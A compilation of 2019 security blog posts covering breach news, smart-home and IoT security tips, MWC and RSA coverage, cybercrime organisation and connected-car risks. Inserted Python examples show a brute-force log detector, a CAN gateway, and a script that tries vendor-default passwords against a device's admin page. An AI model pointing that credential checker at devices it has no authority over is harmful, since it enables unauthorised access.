      • A relatively unknown threat group known as “Whitefly” is allegedly behind an attack on Singapore’s health care database. Security researchers say the group was behind the exposure of 1.5 million patients’ records in July, most likely using DLL load-order (search-order hijacking) attacks.
      • “Scarlett Widow,” a hacking group believed to be based out of Nigeria, recently started a new wave of attacks. The actor has sent several malicious emails to K-12 schools and non-profits, including the Boy Scouts of America. So far the group is believed to hold information on 30,000 individuals from 13,000 organizations across 13 different countries.

      The rest of the news

      • More than 300 million private messages in China were exposed on the internet. It is widely believed that the messages, which were transmitted on secure messaging apps, had been collected by the Chinese government. The database made personal identities searchable by anyone who found the IP address. 
      • U.S. Cyber Command carried out an offensive operation against a Russian troll farm last year. The operation targeted groups known for spreading misinformation, specifically aiming to knock them offline on the day of the 2018 U.S. midterm elections.
      • A new Senate report says Equifax neglected proper cybersecurity practices for years. The credit reporting agency was the victim of a massive cyber attack in 2017 that led to the exposure of 145 million Americans’ personal information. The report states that the attack could have been avoided had the company followed “widely agreed upon” cybersecurity practices. 


      How To Secure Your Smart Home

      Do you live in a “smart” home? If you look around and see interactive speakers, IP cameras, and other internet-connected devices like thermostats and appliances, you are now one of the millions of people who live with so-called “smart” devices. They bring convenience and comfort into our lives, but they also bring greater risks, by giving cybercrooks new opportunities to access our information, and even launch attacks.

      You may remember a couple of years ago when thousands of infected devices (the Mirai botnet) were used to take down the websites of internet giants like Twitter and Netflix by overwhelming them with traffic. The owners of those devices were regular consumers, who had no idea that their IP cameras and DVRs had been compromised. You may also have heard stories of people who were eavesdropped on via their baby monitors, digital assistants, and webcams when their private networks were breached.

      Unfortunately, these are not rare cases. In recent months, the “Internet of Things” (IoT) has been used repeatedly to spy on businesses, launch attacks, or even deliver cryptojacking malware or ransomware.

      Still, given the benefits we get from these devices, they are probably here to stay.  We just need to acknowledge that today’s “smart” devices can be a little “dumb” when it comes to security. Many lack built-in security protections, and consumers are still learning about the risks they can pose. This is particularly concerning since the market for smart devices is large and growing. There are currently 7 billion IoT devices being used worldwide, and that number is expected to grow to 22 billion by 2025.

      Cybercrooks have already taken note of these opportunities, and malware attacks on smart devices have escalated rapidly. In fact, McAfee reported that malware directed at IoT devices was up 73% in the third quarter of 2018 alone.

      So, whether you have one IoT device, or many, it’s worth learning how to use them safely.

      Follow these smart home safety tips:

      • Research before you buy—Although most IoT devices don’t have built-in protection, some are safer than others. Look for devices that make it easy to disable unnecessary features, update software, and change default passwords. If you already have an older device that lacks these features, consider replacing it.
      • Safeguard your devices—Before you connect a new IoT device to your home network (where it can potentially reach data-rich devices like smartphones and computers), change the default username and password to something strong and unique; attackers know the factory defaults and share them online. Then turn off any manufacturer features that do not benefit you, such as remote access. Vendors use remote access to monitor their products, but it can also be used by cybercrooks to reach your device from the internet. Finally, check the manufacturer’s website to make sure the device software is up to date, so that you are patched against known vulnerabilities.
      • Secure your network—Your router is the central hub that connects all of the devices in your home, so you need to make sure that it’s secure. If you haven’t already, change the default password and name of your router, and make sure the network name does not give away your address. Then check that your router is using a strong encryption method such as WPA2 (not the obsolete WEP), which keeps your wireless traffic private. Consider setting up a “guest network” for your IoT devices: a second network on your router that keeps your computers and smartphones separate from IoT devices, so that if a device is compromised, the attacker still cannot reach the valuable information saved on your computers. Check your router’s manual for instructions on how to set up a guest network. You may also want to consider investing in an advanced internet router that has built-in protection and can secure and monitor any device that connects to your network.
      • Install comprehensive security software—Finally, use comprehensive security software that can safeguard all your devices and data from known vulnerabilities and emerging threats.

      Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

      The post How To Secure Your Smart Home appeared first on McAfee Blogs.

      Smashing Security #118: The ‘s’ in IoT stands for security


      Twerking robot assistants, an app from Saudi Arabia that lets men track women, and a gnarly skiing security snarl-up!

      All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by technology journalist Geoff White.

      Cisco, Talos tout importance of IoT security at RSA keynote

      Matt Watchinski, the vice president of Cisco Talos, delivers a keynote address at the RSA Conference in San Francisco on Tuesday.

      By Jonathan Munshaw of Cisco Talos and Liza Meak of The Network, Cisco’s technology news site.

      By 2020, Gartner predicts 20 billion connected devices will be online — and more devices mean more security threats. Connected devices have exploded into the public and corporate landscape, rattling the bars of the cyber security cage.

      In a keynote address at the RSA Conference in San Francisco, Matt Watchinski, the vice president of Cisco Talos, said the growing prevalence of these devices has made protecting them from attackers an urgent priority. Liz Centoni, the senior vice president of Cisco’s IoT (internet-of-things) Business Group, presented alongside Watchinski.

      “These technologies will make it into our critical infrastructure; they’ll make their way into how we deliver water and power,” he said during the address. “We have achieved so much in IT security. We are now going to have to learn a completely different world of OT [operational technology] security."

      One of the most notable and recent IoT security attacks was VPNFilter, which Talos exposed last May. Talos researchers, working with public and private-sector threat intelligence partners and law enforcement, discovered malware infecting hundreds of thousands of networking devices worldwide, ready to act as a “kill switch” to take these devices offline at a moment’s notice.

      Watchinski said VPNFilter is a well-known and well-publicized example, but there are many other daily, systemic attacks the public isn’t aware of that could disrupt daily services people need to live, such as electricity, oil and water.

      Many companies are unprepared to defend against these kinds of attacks. Watchinski and Centoni reiterated that IT and OT teams need to work together to shield any device that connects to the Internet. Centoni said many Cisco customers are unaware of up to 40 or 50 percent of the devices on their network.

      “Security is the reason IT and OT teams are forced to work together,” she said. “Today they work in different worlds.”

      Centoni offered an analogy that sorts existing technology into two different spaces: carpeted and non-carpeted.

      The traditional devices in carpeted environments, such as routers, switches and endpoints, are already well-secured thanks to the work of security researchers and in-house IT teams.

      But other devices, from oil pipelines to parking meters and electric scooters, connect to those same networks from non-carpeted spaces, meaning they exist out in the open. These devices are most at risk because IT teams aren’t currently paying close attention to them.

      Centoni explained the need for security to be baked into the DNA of OT. Once implemented, OT systems usually don’t get upgraded for decades, so security has to be a fundamental part of the original design.

      For more coverage of Cisco’s keynote at RSA, check out live tweets during the event below. You can also watch a recording of the presentation here. And for more of what to expect from Talos at RSA, listen to the latest Beers with Talos podcast here.

      What MWC 2019 Shows Us About the Future of Connectivity

      The time has come to say goodbye to Barcelona as we wrap up our time here at Mobile World Congress (MWC). Although it’s hard to believe that the show is already over, MWC 2019 managed to deliver a slew of showstoppers that captured our attention. Here are some of my main takeaways from the event:

      Foldable Phones Are the Future

      MWC is an opportunity for telecommunications companies, chipmakers, and smartphone firms to show off their latest and greatest innovations, and they sure delivered this year. One particular device that had the show floor buzzing was the Huawei Mate X, a 5G-enabled smartphone that folds out to become an 8-inch tablet. Additionally, Samsung revealed its plans to hold a press event in early April for its foldable smartphone, the Galaxy Fold. Unlike Huawei’s Mate X, the Galaxy Fold bends inward so that it closes like a book. Although neither of these devices is available to the public yet, they have definitely made a bold statement when it comes to smartphone design.

      Smart Home Technology Goes Mobile

       Google is one company taking advantage of smartphone enhancements by putting its Google Assistant into the Android texting app. Assistant for Android Messages allows slices of Google search results to be laid out for users based on their text messages. For example, if one user texted another asking to grab some lunch, a bubble would pop up authorizing Assistant to share suggestions for nearby restaurant locations. While Assistant for Android currently only works for movies and restaurants, we can imagine how this technology could expand to other facets of consumer lives. This addition also demonstrates how AI is slowly but surely making its way onto almost every high-end phone through its apps and other tools.

      Enhancing the Gaming Experience with 5G, VR, and AR

      Not to be shown up, game developers also made a statement by using 5G technology to bring gamers into a more immersive gaming environment. Mobile game developer Niantic, creator of Pokémon Go and the upcoming Harry Potter: Wizards Unite app, is already working on games that will require a 5G upgrade. One prototype the company showcased, codenamed Neon, allows multiple people in the same place to play an augmented reality (AR) game at the same time. Each player’s phone shows the game’s graphics superimposed on the real world and lets players shoot each other, duck and dodge, and pick up virtual items, all in real time.

      Niantic wasn’t the only one looking to expand the gaming experience with the help of 5G. At the Intel and Nokia booths, Sony set up an Oculus Rift VR game inspired by Marvel and Sony’s upcoming film Spider-Man: Far From Home. Thanks to the low latency and real-time responsiveness of 5G, a player in the Nokia booth was able to race a player in the Intel booth as if they were swinging through spiderwebs in Manhattan. Players got a taste of how the next generation of wireless technology will let them take part in a highly immersive gaming experience.

      Bringing 4G and 5G to the Automotive Industry

      Gaming isn’t the only industry that’s getting a facelift from 5G. At the show, Qualcomm announced two new additions to their automotive platform: the Qualcomm Snapdragon Automotive 4G and 5G Platforms. One of the main features of these platforms is vehicle-to-everything communication, or C-V2X, which allows a car to communicate with other vehicles on the road, roadside infrastructure, and more. In addition, the platforms offer a high-precision, multi-frequency global navigation satellite system, which will help enable self-driving implementations. The platforms also include features like multi-gigabit cloud connectivity, high bandwidth low latency teleoperations support, and precise positioning for lane-level navigation accuracy. These advancements in connectivity will potentially help future vehicles to improve safety, communications, and overall in-car experience for consumers.

      Securing Consumers On-the-Go

      The advancements in mobile connectivity have already made a huge impact on consumer lifestyles, especially given the widespread adoption of IoT devices and smart gadgets. But the rise in popularity of these devices has also caught the interest of malicious actors looking to access users’ networks. According to our latest Mobile Threat Report, cybercriminals look to trusted devices to gain access to other devices on the user’s home network. For example, McAfee researchers recently discovered a vulnerability within a Mr. Coffee brand coffee maker that could allow a malicious actor to access the user’s home network. In addition, they also uncovered a new vulnerability within BoxLock smart padlocks that could enable cybercriminals to unlock the devices within a matter of seconds.

      And while consumers must take the necessary security steps to combat vulnerabilities such as these, we at McAfee are also doing our part to help users everywhere remain secure. For instance, we’ve recently extended our partnerships with both Samsung and Türk Telekom in order to overcome some of these cybersecurity challenges. Together, we’re working to secure consumers from cyberthreats on Samsung Galaxy S10 smartphones and provide McAfee Safe Family protection for Türk Telekom’s fixed and mobile broadband customers.

      While the likes of 5G, bendable smartphones, and VR took this year’s tradeshow by storm, it’s important for consumers to keep the cybersecurity implications of these advancements in mind. As the sun sets on our time here in Barcelona, we will keep working to safeguard every aspect of the consumer lifestyle so they can embrace improvements in mobile connectivity with confidence.

      To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

      The post What MWC 2019 Shows Us About the Future of Connectivity appeared first on McAfee Blogs.

      Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships

      We’ve touched down in Barcelona for Mobile World Congress 2019 (MWC), which is looking to stretch the limits of mobile technology with new advancements made possible by the likes of IoT and 5G. This year, we are excited to announce the unveiling of our 2019 Mobile Threat Report, our extended partnership with Samsung to protect Galaxy S10 smartphones, and our strengthened partnership with Türk Telekom to provide a security solution to protect families online.

      Mobile Connectivity and the Evolving Threat Landscape

      These days, it’s a rare occurrence to enter a home that isn’t utilizing smart technology. Devices like smart TVs, voice assistants, and security cameras make our lives more convenient and connected. However, as consumers adopt this technology into their everyday lives, cybercriminals find new ways to exploit these devices for malicious activity. With an evolving threat landscape, cybercriminals are shifting their tactics in response to changes in the market. As we revealed in our latest Mobile Threat Report, malicious actors look for ways to maximize their profit, primarily through gaining control of trusted IoT devices like voice assistants. There are over 25 million voice assistants in use across the globe and many of these devices are connected to other things like thermostats, door locks, and smart plugs. With this increase in connectivity, cybercriminals have more opportunities to exploit users’ devices for malicious purposes. Additionally, cybercriminals are leveraging users’ reliance on their mobile phones to mine for cryptocurrency without the device owner’s knowledge. According to our Mobile Threat Report, cybersecurity researchers found more than 600 malicious cryptocurrency apps spread across 20 different app stores. In order to protect users during this time of rapid IoT and mobile growth, we here at McAfee are pushing to deliver solutions for relevant, real-world security challenges with the help of our partners.

      Growing Partnerships to Protect What Matters

      Some cybersecurity challenges we are working to overcome include threats like mobile malware and unsecured Wi-Fi. This year, we’ve extended our long-standing partnership with Samsung to help secure consumers from cyberthreats on Samsung Galaxy S10 smartphones. McAfee is also supporting Samsung Secure Wi-Fi service by providing backend infrastructure to protect consumers from risky Wi-Fi. In addition to mobile, this partnership also expands to help protect Samsung smart TVs, PCs, and laptops.

      We’ve also strengthened our partnership with Türk Telekom, Turkey’s largest fixed broadband ISP. Last year, we announced this partnership to deliver cross-device security protection. This year, we’re providing a security solution to help parents protect their family’s digital lives. Powered by McAfee Safe Family, Türk Telekom’s fixed and mobile broadband customers will have the option to benefit from robust parental controls. These controls will allow parents to better manage their children’s online experience and give them greater peace of mind.

      We’re excited to see what’s to come for the rest of MWC, and how these announcements will help improve consumers’ digital experiences. It is our hope that by continuing to extend our relationships with technology innovators, we can help champion built-in security across devices and networks.

      To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

      The post Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships appeared first on McAfee Blogs.

      The Business of Organised Cybercrime

      Guest article by David Warburton, Senior Threat Research Evangelist, F5 Networks

      Team leader, network administrator, data miner, money specialist. These are just some of the roles making a difference in today’s enterprises. The same is also true for sophisticated cybergangs.

      Many still wrongly believe that the dark web is exclusively inhabited by hoodie-clad teenagers and legions of disaffected disruptors. The truth is, the average hacker is just a cog in a complex ecosystem more akin to that of a corporate enterprise than you think. The only difference is the endgame, which is usually to cause reputational or financial damage to governments, businesses and consumers.

      There is no way around it; cybercrime is now run like an industry with multiple levels of deceit shielding those at the very top from capture. Therefore, it’s more important than ever for businesses to re-evaluate cybercriminal perceptions and ensure effective protective measures are in place.

      Current perceptions surrounding Cybergangs

      Cybergangs as a collective are often structured like legitimate businesses, including partner networks, resellers and vendors. Some have even set up call centres to field interactions with ransomware victims. Meanwhile, entry-level hackers across the world are embarking on career development journeys of sorts, enjoying opportunities to learn and develop skills. 

      This includes the ability to write their own tools or enhance the capabilities of others. In many ways, it is a similar path to that of an intern. They often become part of sophisticated groups or operations once their abilities reach a certain level. Indeed, a large proportion of hackers are relatively new entrants to the cybercrime game and still use low-level tools to wreak havoc. This breed of cybercriminal isn’t always widely feared by big corporations. They should be.

      How Cybergangs are using Technology to Work Smarter and Cheaper

      Cybergangs often work remotely across widely dispersed geographies, which makes them tricky to detect and deal with. The nature of these structures also means that cyber attacks are becoming more automated, rapid and cost-effective. The costs and risks are further reduced when factoring in the fluidity and inherent anonymity of cryptocurrencies and the dark web.

      The industry has become so robust that hackers can even source work on each link in an attack chain at an affordable rate. Each link is anonymous to other threat actors in the chain to vastly reduce the risk of detection.

      IoT Vulnerabilities on the Rise
      According to IHS Markit, there will be 125 billion IoT devices on the planet by 2030.  With so much hype surrounding the idea of constant and pervasive connectivity, individuals and businesses are often complacent when it comes to ensuring all devices are secure. 

      Significantly, it is easier to compromise an IoT device that is exposed to the public Internet and protected with known vendor default credentials than it is to trick an individual into clicking on a link in a phishing email.

      Consequently, it is crucial for organisations to have an IoT strategy in place that encompasses the monitoring and identification of traffic patterns for all connected devices. Visibility is essential to understand network behaviour and any potential suspicious activities that may occur on it.

      Why Cybersecurity Mindsets must Change

      IT teams globally have been lecturing staff for years on the importance of using a different password for every account. Overall, the message is still not resonating enough.

      To combat the issue, businesses need to consider alternative tactics such as password manager applications, as well as ensuring continuous security training is available and compulsory for all staff.

      It is worth noting that the most commonly attacked credentials are the vendor defaults for some of the most widely used applications in enterprise environments. Simply having a basic system hardening policy that ensures vendor default credentials are disabled or changed before a system goes live will prevent this common issue from turning into a painful breach. System hardening is a requirement in every best-practice security framework and compliance regime.
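      The check that this hardening paragraph and the smart-home tips above both call for, as an added example that is not from either post: a script that tries a short list of vendor-default credentials against a device's HTTP Basic-auth admin page before the device goes live. To keep it runnable offline, the target is a mock device served in-process; the credential list, the mock's admin/admin login and the placeholder address in the usage note are assumptions for the example, not a vendor database.

```python
"""Pre-go-live check: does this device's admin page still accept vendor defaults?"""
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumed, representative vendor-default pairs; a real audit loads the
# documented defaults for the exact make and model being checked.
DEFAULT_CREDENTIALS = [
    ("admin", "admin"),
    ("admin", "password"),
    ("admin", "1234"),
    ("root", "root"),
    ("user", "user"),
]


def try_basic_auth(url, username, password, timeout=3):
    """Return True if the admin page accepts these HTTP Basic credentials."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status < 400
    except urllib.error.HTTPError as err:
        if err.code in (401, 403):
            return False          # rejected: not these credentials
        raise                     # anything else is a real error, surface it


def check_default_credentials(url, candidates=DEFAULT_CREDENTIALS):
    """Return the first accepted (username, password) pair, or None when the
    device rejects every default in the list."""
    for username, password in candidates:
        if try_basic_auth(url, username, password):
            return (username, password)
    return None


class MockDeviceHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for an IoT admin page behind HTTP Basic auth."""
    accepted = "admin:admin"      # overridden per mock instance below

    def do_GET(self):
        expected = "Basic " + base64.b64encode(self.accepted.encode()).decode()
        if self.headers.get("Authorization", "") == expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"device admin page")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="device"')
            self.end_headers()

    def log_message(self, format, *args):
        pass                      # keep the example quiet


def start_mock_device(accepted="admin:admin"):
    """Serve the mock device on an ephemeral localhost port; return (url, server)."""
    handler = type("Handler", (MockDeviceHandler,), {"accepted": accepted})
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_port}/", server


def audit_mock_device(accepted="admin:admin"):
    """Start a mock device with the given login, audit it, then tear it down."""
    url, server = start_mock_device(accepted)
    try:
        return check_default_credentials(url)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("factory-fresh device:", audit_mock_device("admin:admin"))
    print("after changing the password:", audit_mock_device("admin:Tq9!vR2#long-phrase"))
```

      Against real equipment you own, call check_default_credentials("http://192.0.2.1/") with the device's admin URL (a placeholder address here); the script stops at the first accepted pair, and a non-None result means the device must not go on the network until the credential is changed. Devices with form-based logins rather than HTTP Basic auth need the request in try_basic_auth adapted accordingly.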

      Ultimately, someone responsible for compliance, audit or security should be continually reviewing access to all systems. Commonly, security teams focus only on systems within the scope of some compliance or regulatory obligation and fail to review seemingly innocuous systems; that omission occasionally results in major breaches.

      In addition to continual access reviews, monitoring should be in place to detect access attacks. Brute force attacks can not only lead to a breach, they can also result in performance impacts on the targeted system or lock customers out of their accounts. As a result, there are significant financial incentives for organisations to equip themselves with appropriate monitoring procedures.
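      The monitoring this paragraph asks for, as an added example that is not part of the article: a sliding-window detector run over a few constructed sshd-style log lines. It raises one alert when a source reaches the failure threshold inside the window, and a separate, higher-severity alert when that same source then logs in successfully, which is the case that most often marks a breach rather than a nuisance. The log lines, threshold and window are assumptions for the example.

```python
"""Brute-force and success-after-brute-force detection over auth log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd-style sample (not real logs): one source hammers "admin"
# and "root" and then gets in; a legitimate user mistypes once.
SAMPLE_LOG = """\
Mar  8 10:00:01 host sshd[1]: Failed password for admin from 203.0.113.5 port 5001 ssh2
Mar  8 10:00:02 host sshd[1]: Failed password for admin from 203.0.113.5 port 5002 ssh2
Mar  8 10:00:03 host sshd[1]: Failed password for root from 203.0.113.5 port 5003 ssh2
Mar  8 10:00:04 host sshd[1]: Failed password for invalid user test from 203.0.113.5 port 5004 ssh2
Mar  8 10:00:05 host sshd[1]: Failed password for admin from 203.0.113.5 port 5005 ssh2
Mar  8 10:00:06 host sshd[1]: Accepted password for admin from 203.0.113.5 port 5006 ssh2
Mar  8 10:00:30 host sshd[1]: Failed password for alice from 198.51.100.7 port 6001 ssh2
Mar  8 10:02:30 host sshd[1]: Accepted publickey for alice from 198.51.100.7 port 6002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<month>\w{3})\s+(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+"
)


def parse_line(line):
    """Return the fields of one sshd auth line, or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog lines carry no year; relative timestamps are all the detector needs
    ts = datetime.strptime(f"{m['month']} {m['day']} {m['time']}", "%b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "src": m["src"]}


def detect_auth_attacks(lines, threshold=5, window_seconds=60):
    """Flag a source once it reaches `threshold` failures inside `window_seconds`,
    and flag separately when such a source then authenticates successfully."""
    failures = defaultdict(deque)   # src -> timestamps of recent failures
    alerted = set()                 # sources already reported, to avoid alert spam
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        recent = failures[ev["src"]]
        while recent and (ev["ts"] - recent[0]).total_seconds() > window_seconds:
            recent.popleft()        # drop failures that fell out of the window
        if ev["result"] == "Failed":
            recent.append(ev["ts"])
            if len(recent) >= threshold and ev["src"] not in alerted:
                alerted.add(ev["src"])
                alerts.append({"type": "brute-force", "src": ev["src"],
                               "failures": len(recent), "at": ev["ts"]})
        elif len(recent) >= threshold:
            alerts.append({"type": "success-after-brute-force", "src": ev["src"],
                           "user": ev["user"], "at": ev["ts"]})
    return alerts


def demo():
    """Run the detector over the constructed sample and return its alerts."""
    return detect_auth_attacks(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

      The same two-stage logic applies to web login logs or an IoT device's admin interface once parse_line is swapped for the right format; the success-after-failures alert is the one to route to an on-call responder, because account lockouts and rate limits address the first stage but not a guessed credential that has already worked.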

      Cybergangs use many different methods to wreak havoc, making it increasingly difficult to identify attacks in a timely manner. Businesses are often ignorant about the size of attacks, the scope of what has been affected, and the scale of the operation behind them. You are operating in the dark without doing the utmost to know your enemy. Failing to do so will continue to put information, staff and customers at risk by allowing cybergangs to operate in the shadows.
      David Warburton is a Senior Threat Research Evangelist with F5 Labs, with over 20 years’ experience in IT and security.

      Automotive Technologies and Cyber Security

      A guest article authored by Giles Kirkland
      Giles is a car expert and dedicated automotive writer with a great passion for electric vehicles, autonomous cars and other innovative technologies. He loves researching the future of motorisation and sharing his ideas with auto enthusiasts across the globe. You can find him on Twitter, Facebook and at Oponeo.


      Surveys show that about 50% of UK respondents feel that driverless vehicles will make their lives much easier and are eagerly anticipating the arrival of this technology. Cities expect that when driverless car technology is fully implemented, the gridlock which now plagues their streets will be relieved to a large extent. Auto-makers predict that the new technology will encourage a surge in vehicle purchases, and technology companies are lining up with the major auto manufacturers to lend their experience and knowledge to the process, hoping to earn huge profits.



      Delays to Driverless Technology
      While some features of autonomous technology have already been developed and have been rolled out in various new vehicles, the full technology will probably not be mature for several decades yet. One of the chief holdups is in establishing the infrastructure necessary on the roads themselves and in cities, in order to safely enable driverless operation.

      The full weight of modern technology is pushing development along at a breakneck pace. Unlike safety testing of the past, where some real-life scenarios were simulated to anticipate vehicle reactions, high-powered simulators have now been setup to increase the rapidity at which vehicle software can 'learn' what to do in those real-life situations. This has enabled learning at a rate exponentially greater than any vehicle of the past, which is not surprising, since vehicles of the past were not equipped with 'brains' like autonomous cars will be.

      The Cyber Security aspect of Autonomous Vehicles
      Despite the enormous gains that will come from autonomous vehicles, both socially and economically, there will inevitably be some problems which will arise, and industry experts agree that the biggest of these threats is cyber security. In 2015 there was a famous incident which dramatically illustrated the possibilities: white-hat researchers took remote control of a Jeep Cherokee over the Internet by exploiting its Uconnect connected infotainment system, reaching the vehicle's driving functions from there. This glaring shortcoming caused Fiat Chrysler to recall more than one million vehicles, and provided the world with an alarming illustration of what could happen if someone with criminal intent breached the security of a vehicle.

      Cars today have as many as 100 electronic control units (ECUs) running more than 100 million lines of code, which presents a huge target to the criminally minded. A hacker who gains control of a peripheral ECU, for instance the one handling Bluetooth, could in principle pivot to the ECUs responsible for a whole host of safety systems, unless the in-vehicle network is segmented so that the peripheral bus cannot send arbitrary messages to the safety-critical one. Connected cars of the future will of course have even more ECUs controlling the vehicle's operations, which will provide even more opportunities for cyber attack.


      Defense against Cyber Attacks
      As scary as the whole cyber situation sounds, with the frightening prospect of complete loss of control of a vehicle, there is reason to think that the threat can be managed effectively. Numerous companies are already involved in research and development on how to make cars resistant to attacks, using a multi-tiered defense involving several different security products installed at different levels of the car's architecture.

      Individual systems and ECUs can be hardened against attacks. One level up from that, software protection is being developed to safeguard the vehicle's entire internal network. In the layer above that, there are already solutions in place to defend vehicles at the point where ECUs connect to external sources. This is perhaps the most critical area, since it represents the line between internal and external communications. The final layer of security comes from the cloud, where threats can be identified and thwarted before they ever reach a car.
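      The gateway layer described above, as an added example that is not from the article or any manufacturer's design: a CAN gateway sitting between an externally reachable segment (the infotainment/telematics bus, the kind of entry point used in the Jeep case) and the powertrain bus. It forwards only arbitration IDs on a per-direction allow-list, drops malformed frames, and rate-limits what the low-trust side may inject, so a compromised peripheral ECU cannot spoof a brake command or flood the safety-critical bus. The bus names, IDs and traffic are assumptions constructed for the example.

```python
"""Allow-list CAN gateway between a low-trust and a safety-critical bus segment."""
from collections import Counter, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class CanFrame:
    bus: str        # segment the frame arrived on
    arb_id: int     # 11-bit standard CAN identifier
    data: bytes     # 0..8 payload bytes
    ts: float       # receive time in seconds


# Forwarding policy: source bus -> destination bus -> permitted IDs.
# Assumed layout for the example, not a real vehicle's message map.
POLICY = {
    "infotainment": {
        "powertrain": {0x3A0},                  # ambient temperature broadcast only
    },
    "powertrain": {
        "infotainment": {0x100, 0x101, 0x1A0},  # speed, rpm, gear for the display
    },
}

# Frames per second, per ID, that a low-trust segment may push through.
RATE_LIMIT = {"infotainment": 10}


class CanGateway:
    def __init__(self, policy=POLICY, rate_limit=RATE_LIMIT):
        self.policy = policy
        self.rate_limit = rate_limit
        self._recent = {}      # (bus, arb_id) -> deque of forwarded timestamps
        self.dropped = []      # (frame, reason) pairs for the audit log

    def _within_rate(self, frame):
        limit = self.rate_limit.get(frame.bus)
        if limit is None:
            return True        # trusted segment: no cap
        window = self._recent.setdefault((frame.bus, frame.arb_id), deque())
        while window and frame.ts - window[0] >= 1.0:
            window.popleft()   # keep only the last second of forwards
        if len(window) >= limit:
            return False
        window.append(frame.ts)
        return True

    def route(self, frame):
        """Return the (destination_bus, frame) pairs to forward; record drops."""
        if not 0 <= frame.arb_id <= 0x7FF or len(frame.data) > 8:
            self.dropped.append((frame, "malformed"))
            return []
        dests = [dest for dest, allowed in self.policy.get(frame.bus, {}).items()
                 if frame.arb_id in allowed]
        if not dests:
            self.dropped.append((frame, "not-in-allow-list"))
            return []
        if not self._within_rate(frame):
            self.dropped.append((frame, "rate-limit"))
            return []
        return [(dest, frame) for dest in dests]


def demo():
    """Constructed traffic: a legitimate broadcast, a spoofed brake command
    injected from the infotainment side, a status frame, then a flood."""
    gw = CanGateway()
    frames = [
        CanFrame("infotainment", 0x3A0, b"\x17", 0.00),      # temperature: allowed
        CanFrame("infotainment", 0x2F0, b"\x01\xff", 0.01),  # fake brake cmd: blocked
        CanFrame("powertrain", 0x100, b"\x00\x5a", 0.02),    # speed to display: allowed
    ]
    frames += [CanFrame("infotainment", 0x3A0, b"\x17", 0.10 + i * 0.01)
               for i in range(20)]                           # 20 frames in 0.2 s
    forwarded = [hop for f in frames for hop in gw.route(f)]
    return {"forwarded": len(forwarded),
            "dropped": dict(Counter(reason for _, reason in gw.dropped))}


if __name__ == "__main__":
    print(demo())
```

      The allow-list is checked before the rate counter so that blocked IDs never consume a legitimate ID's budget, and every drop is recorded with a reason: in a real gateway that log is what the in-network monitoring layer consumes to spot an ECU that has started behaving like an attacker.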

      The Cyber Security Nightmare
      If you ask an average person in the UK what the biggest problem associated with driverless cars is, they’d probably cite safety. Industry experts, however, feel that once the technology has been worked out there will probably be fewer highway accidents and that driving safety will actually improve. The nightmare of dealing with the threat that always exists when anything is connected to the Internet, however, will remain a cause for concern.

      Cyber Security Roundup for January 2019

      The first month of 2019 was a relatively slow month for cyber security in comparison with the steady stream of cyber attacks and breaches throughout 2018. On Saturday 26th January, car services and repair outfit Kwik Fit told customers its IT systems had been taken offline due to malware, which disrupted its ability to book in car repairs. Kwik Fit didn't provide any details about the malware, but it is fair to speculate that the outbreak was likely caused by a general lack of security patching and anti-virus protection as opposed to anything sophisticated.

B&Q said it had taken action after a security researcher found and disclosed details of B&Q suspected store thieves online. According to Ctrlbox Information Security, the exposed records included 70,000 offender and incident logs, which included:

• the first and last names of individuals caught or suspected of stealing goods from stores
• descriptions of the people involved, their vehicles and other incident-related information
• the product codes of the goods involved
• the value of the associated loss

Hundreds of German politicians, including Chancellor Angela Merkel, had personal details stolen and published online at the start of January. A 20-year-old suspect was later arrested in connection with this disclosure. Investigators said the suspect had acted alone and had taught himself the skills he needed using online resources, and had no training in computer science. Yet another example of the low entry level for individuals in becoming a successful and sinister hacker.

Hackers took control of 65,000 Smart TVs around the world, in yet another stunt to support YouTuber PewDiePie. A video message was displayed on the vulnerable TVs which read "Your Chromecast/Smart TV is exposed to the public internet and is exposing sensitive information about you!" It then encourages victims to visit a web address before finishing up with, "you should also subscribe to PewDiePie".
      Hacked Smart TVs: The Dangers of Exposing Smart TVs to the Net

The PewDiePie hackers said they had discovered a further 100,000 vulnerable devices, while Google said its products were not to blame but was reported to have fixed them anyway. In the previous month two hackers carried out a similar stunt by forcing thousands of printers to print similar messages. There was an interesting video of the negative impact of that stunt on the hackers on the BBC News website - The PewDiePie Hackers: Could hacking printers ruin your life?

Security company ForeScout said it had found thousands of vulnerable devices using the search engines Shodan and Censys, many of which were located in hospitals and schools. Heating, ventilation, and air conditioning (HVAC) systems were among those that the team could have taken control of after it developed its own proof-of-concept malware.

Reddit users found they were locked out of their accounts after an apparent credential stuffing attack forced a mass password reset by Reddit in response. A Reddit admin said a "large group of accounts were locked down" due to anomalous activity suggesting unauthorised access.

